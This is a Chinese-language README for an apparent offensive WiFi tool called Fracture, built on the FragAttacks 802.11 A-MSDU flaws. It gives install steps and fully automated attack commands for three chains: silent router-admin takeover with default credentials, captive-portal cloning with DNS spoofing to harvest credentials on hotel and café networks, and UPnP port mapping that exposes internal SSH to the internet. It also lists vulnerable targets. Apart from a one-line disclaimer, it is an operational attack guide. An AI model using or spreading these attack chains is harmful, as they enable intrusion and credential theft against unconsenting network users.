FragAttacks WiFi渗透测试框架 — CVE-2020-24586/87/88
FragAttacks WiFi 渗透框架
CVE-2020-24586 / CVE-2020-24587 / CVE-2020-24588
Fracture 通过 802.11 帧注入自动化三种新颖的攻击链。它利用 WPA2/WPA3 中的 A-MSDU 聚合漏洞,将任意明文帧注入加密网络——无需知道密码。
仅用于授权的渗透测试。仅可对您拥有或已获得明确书面许可的网络进行测试。
802.11 QoS 控制字段中的 A-MSDU present 标志不受 CCMP/GCMP 认证保护。通过在精心构造的帧中设置此标志,攻击者使接收端将有效载荷解释为内部以太网帧,从而完全绕过加密。
Fracture 利用此原语实现三种攻击路径:
从网络外部向路由器管理界面(192.168.x.1 及常见变种)直接注入 HTTP 请求。尝试使用默认凭据和已知的 TP-Link、D-Link、Netgear、ASUS 固件未认证 CVE 端点。静默运行——无需解除认证,无可见特征。
检测强制门户网络,克隆门户页面,然后注入伪造的 DNS 响应以重定向已连接的客户端。当客户端向克隆页面提交凭据时,Fracture 捕获凭据并使用它们进行合法认证。目标:酒店 WiFi、企业访客网络、咖啡店热点。
注入 UPnP SSDP 发现和 SOAP AddPortMapping 命令。大多数家用路由器无需认证即可接受这些命令。若成功,将在路由器的 WAN 接口上打开一个外部端口,转发到内部客户端的 SSH——从而从任何位置获得入站访问,无需接触 WiFi 密码。
sudo apt install python3-scapy python3-requests python3-bs4 python3-flask
git clone https://github.com/fracture-wifi/fracture
cd fracture
sudo pip3 install -e . --break-system-packages
安装后,fracture 可作为系统命令使用。
# 先将适配器置于监控模式
sudo iwconfig wlan1 mode monitor
# 全自动——扫描、选择目标、运行所有适用路径
sudo fracture -i wlan1
# 仅扫描——不执行攻击
sudo fracture -i wlan1 --scan-only
# 锁定到特定目标
sudo fracture -i wlan1 -t AA:BB:CC:DD:EE:FF
# 强制使用特定路径
sudo fracture -i wlan1 --path 1 # 路由器管理
sudo fracture -i wlan1 --path 2 # 门户收集
sudo fracture -i wlan1 --path 3 # UPnP
# 详细注入日志
sudo fracture -i wlan1 -v
# 详细帮助
sudo fracture --about
| 目标 | 原因 |
|---|---|
| 家用路由器(TP-Link、D-Link、Netgear、ASUS) | 出厂固件、默认凭据、UPnP 已启用 |
| IoT 设备 | 2021 年后几乎从未修复 |
| 强制门户网络 | 酒店/咖啡店 WiFi 设计围绕凭据提交 |
企业设备(Cisco、Aruba、Ruckus、Ubiquiti)通常已打好补丁。
fracture/
├── fracture/
│ ├── __init__.py 版本、元数据
│ ├── __main__.py 入口点、协调
│ ├── tui.py 终端界面、颜色、表格
│ ├── scanner.py 信道跳跃 AP/客户端发现
│ ├── injector.py FragAttacks 帧引擎(CVE-2020-24588)
│ ├── portal.py 门户检测、克隆、凭据服务器
│ └── paths.py 三种攻击链
├── setup.py
└── README.md
MIT
| Linux 内核 < 5.12.4 | 未打补丁的内核 |
| 2021 年 6 月之前的 Windows | 未打补丁的操作系统 |